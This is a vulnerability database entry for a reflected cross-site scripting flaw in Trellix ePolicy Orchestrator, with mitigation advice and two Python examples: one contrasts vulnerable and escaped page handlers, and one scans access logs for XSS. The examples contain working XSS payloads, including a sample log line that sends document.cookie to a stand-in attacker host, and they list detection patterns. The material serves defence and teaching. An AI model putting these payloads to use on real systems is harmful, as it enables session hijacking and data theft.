CVE-2022-3339: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Trellix Trellix ePolicy Orchestrator (ePO)
A reflected cross-site scripting (XSS) vulnerability in ePO prior to 5.10 Update 14 allows a remote unauthenticated attacker to potentially obtain access to an ePO administrator's session by convincing the authenticated ePO administrator to click on a carefully crafted link. This would lead to limited access to sensitive information and limited ability to alter some information in ePO.
AI Analysis
Technical Summary
CVE-2022-3339 is a reflected cross-site scripting (XSS) vulnerability in Trellix ePolicy Orchestrator (ePO), the centralized console used to manage Trellix (formerly McAfee) endpoint security products. It affects ePO 5.10 before Update 14. An attacker with no account on the ePO server crafts a URL that carries script in a request parameter; when a logged-in ePO administrator opens that URL, the console reflects the parameter into the page without neutralizing it (CWE-79) and the script runs in the administrator's browser inside the ePO origin. Because the script executes within the victim's existing authenticated session, it can issue requests to the console on the administrator's behalf, which is the source of the advisory's "limited access to sensitive information" and "limited ability to alter some information". The attacker needs no prior authentication or privileges, but the victim must click the link while logged in. The CVSS v3.1 base score is 5.4 (medium): network attack vector, low attack complexity, no privileges required, user interaction required, low confidentiality and integrity impact, no availability impact. No public exploit was reported at the time of the advisory, but an ePO administrator session is a high-value target because ePO distributes policies and tasks to every managed endpoint.
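The mechanism behind CWE-79 in the summary above, as an added example that is not ePO code (the vulnerable ePO endpoint and parameter are not published in this advisory, so the page templates, the `/console/search` path and the `q` parameter are hypothetical stand-ins). It contrasts a handler that reflects a parameter verbatim with one that escapes it, and also shows why escaping for text content is not enough when the value lands inside an HTML attribute:

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed, hypothetical page templates standing in for a console page that
# reflects a request parameter. Not ePO code.
TEXT_TEMPLATE = "<html><body><h1>Results for: {term}</h1></body></html>"
ATTR_TEMPLATE = '<html><body><input name="q" value="{term}"></body></html>'


def _param(query_string: str, name: str = "q") -> str:
    """Pull one parameter out of a query string (parse_qs URL-decodes it)."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(query_string: str) -> str:
    """CWE-79: the parameter is written into the page exactly as received."""
    return TEXT_TEMPLATE.format(term=_param(query_string))


def render_text_escaped(query_string: str) -> str:
    """Hardened for text content: html.escape turns <, > and & into entities."""
    return TEXT_TEMPLATE.format(term=html.escape(_param(query_string), quote=False))


def render_attr_partial(query_string: str) -> str:
    """Common mistake: text-context escaping reused inside a quoted attribute.
    Quotes survive, so the payload can close the attribute and add an event handler."""
    return ATTR_TEMPLATE.format(term=html.escape(_param(query_string), quote=False))


def render_attr_escaped(query_string: str) -> str:
    """Hardened for attribute context: quote=True also encodes double and single quotes."""
    return ATTR_TEMPLATE.format(term=html.escape(_param(query_string), quote=True))


def crafted_link(base_url: str, payload: str) -> str:
    """The 'carefully crafted link' of the advisory: payload URL-encoded into the query."""
    return base_url + "?" + urlencode({"q": payload})


def script_can_run(page: str) -> bool:
    """Crude oracle for the demo: a script element or an inline event handler in the page."""
    lowered = page.lower()
    return "<script" in lowered or bool(re.search(r'\son[a-z]+="', lowered))


if __name__ == "__main__":
    # Hypothetical ePO console URL; the payload fetches a console page on the
    # victim's behalf using the browser's existing authenticated session.
    link = crafted_link("https://epo.example.invalid/console/search",
                        "<script>fetch('/console/export').then(r=>r.text())</script>")
    print(link)
    qs = urlsplit(link).query
    for render in (render_vulnerable, render_text_escaped):
        print(f"{render.__name__:22s} script executes: {script_can_run(render(qs))}")
    attr_link = crafted_link("https://epo.example.invalid/console/search",
                             '" autofocus onfocus="alert(document.domain)')
    attr_qs = urlsplit(attr_link).query
    for render in (render_attr_partial, render_attr_escaped):
        print(f"{render.__name__:22s} script executes: {script_can_run(render(attr_qs))}")
```

The attribute case is the one to remember when reviewing a fix: `html.escape` with `quote=False` (the default in many templating helpers) is correct for text between tags but lets `"` through, so a payload such as `" autofocus onfocus="...` still produces an executable handler.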
Potential Impact
For European organizations, this vulnerability could undermine the integrity and confidentiality of endpoint security management, potentially allowing attackers to manipulate security policies or access sensitive security data. Given that ePO is often used to manage large fleets of endpoints, unauthorized access to the management console could facilitate further attacks or weaken overall security posture. The impact is particularly significant in sectors with stringent regulatory requirements for data protection and cybersecurity, such as finance, healthcare, and critical infrastructure. Although the vulnerability does not allow full system takeover or availability disruption, the ability to alter some information and access sensitive data can lead to compliance violations, data breaches, and erosion of trust in security controls. The requirement for user interaction (clicking a crafted link) means that social engineering or phishing campaigns could be used to exploit this vulnerability, increasing the risk in environments where administrators may be targeted.
Mitigation Recommendations
Upgrade Trellix ePO to 5.10 Update 14 or later, which contains the fix. Until the upgrade is done, treat the administrator's browser session as the asset at risk: a reflected XSS payload runs inside a session that is already authenticated, so multi-factor authentication at login does not stop exploitation, although MFA still limits what an attacker can do with any credentials harvested through the payload. Keep ePO session lifetimes short and have administrators log out rather than leave the console open. Restrict the console to a management network or jump host, and have administrators use a dedicated browser profile for ePO so that a link opened from email or chat does not land in the authenticated session. Email and web filtering reduce delivery of crafted links, and awareness training should cover this case specifically: the link points at the organization's own ePO server, so checking the hostname alone will not flag it. Review the ePO web server access logs for console requests whose query strings contain script markup, especially requests with no Referer or with a webmail Referer, and correlate them with ePO audit-log entries for policy or task changes shortly afterwards. Finally, minimize the number of accounts that hold ePO administrator rights.
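A way to do the access-log review suggested above, as an added example that is not part of the advisory or of Trellix tooling. The log lines are constructed in Apache/Tomcat combined format with hypothetical console paths and parameters; the point it makes that prose alone does not is that the source address in such a log is the victim administrator's workstation, not the attacker's, because the crafted link is fetched by the administrator's own browser. It also handles double URL-encoding, a common filter bypass:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines, not real ePO logs. Every request here comes from the
# administrator's workstation (10.0.0.5): in a reflected-XSS attack the attacker
# never contacts the server, so source IP is useless for triage and the payload
# plus the missing Referer (link opened from a mail client) are the signals.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2022:09:14:02 +0200] "GET /console/search?q=agent+handler HTTP/1.1" 200 1532 "https://epo.example.invalid/console/" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2022:09:15:47 +0200] "GET /console/search?q=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 1601 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2022:09:16:03 +0200] "GET /console/search?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert%25281%2529%253E HTTP/1.1" 200 1588 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2022:09:17:30 +0200] "GET /console/help?topic=onboarding HTTP/1.1" 200 2210 "https://epo.example.invalid/console/" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2022:09:18:11 +0200] "GET /console/redirect?next=javascript:alert(document.domain) HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache/Tomcat "combined" log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Markers are matched against the decoded, lowercased request target. The event
# handler list is deliberately explicit so words like "onboarding" do not fire.
XSS_MARKERS = [
    ("script element", re.compile(r"<\s*script", re.I)),
    ("tag with event handlers", re.compile(r"<\s*(?:img|svg|iframe|object|embed|body|video|audio)\b", re.I)),
    ("inline event handler", re.compile(
        r"\bon(?:error|load|focus|click|mouseover|mouseenter|animationstart|toggle|pointerover)\s*=", re.I)),
    ("javascript: URI", re.compile(r"javascript\s*:", re.I)),
    ("cookie/location access", re.compile(r"document\.(?:cookie|location)", re.I)),
]


def normalise(target: str, rounds: int = 3) -> str:
    """URL-decode repeatedly until stable (double-encoded payloads are a common
    bypass), then lowercase. Lossy by design: '+' becomes a space on every pass,
    which is fine for matching but do not use this to reproduce a payload exactly."""
    current = target
    for _ in range(rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current.lower()


def scan_request(target: str) -> list:
    """Names of the XSS markers present in one request target after normalisation."""
    decoded = normalise(target)
    return [name for name, rx in XSS_MARKERS if rx.search(decoded)]


def scan_log(text: str) -> list:
    """Parse combined-format lines and return one finding per request carrying markers."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = scan_request(m["target"])
        if hits:
            findings.append({
                "time": m["time"], "ip": m["ip"], "status": m["status"],
                "referer": m["referer"], "target": m["target"], "markers": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} referer={f['referer']}")
        print(f"    {', '.join(f['markers'])}")
        print(f"    {f['target'][:100]}")
```

A hit with status 200 tells you the page reflected the payload; pair it with the ePO audit log for the same administrator account in the following minutes to see whether anything was changed.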
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Poland, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: trellix
- Date Reserved: 2022-09-27T00:00:00.000Z
- CISA Enriched: true
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 682d9818c4522896dcbd8339
Added to database: 5/21/2025, 9:08:40 AM
Last enriched: 7/5/2025, 5:40:35 AM
Last updated: 8/12/2025, 12:33:18 AM
Related Threats
- CVE-2025-9091: Hard-coded Credentials in Tenda AC20 (Low)
- CVE-2025-9090: Command Injection in Tenda AC20 (Medium)
- CVE-2025-9092: CWE-400 Uncontrolled Resource Consumption in Legion of the Bouncy Castle Inc. Bouncy Castle for Java - BC-FJA 2.1.0 (Low)
- CVE-2025-9089: Stack-based Buffer Overflow in Tenda AC20 (High)
- CVE-2025-9088: Stack-based Buffer Overflow in Tenda AC20 (High)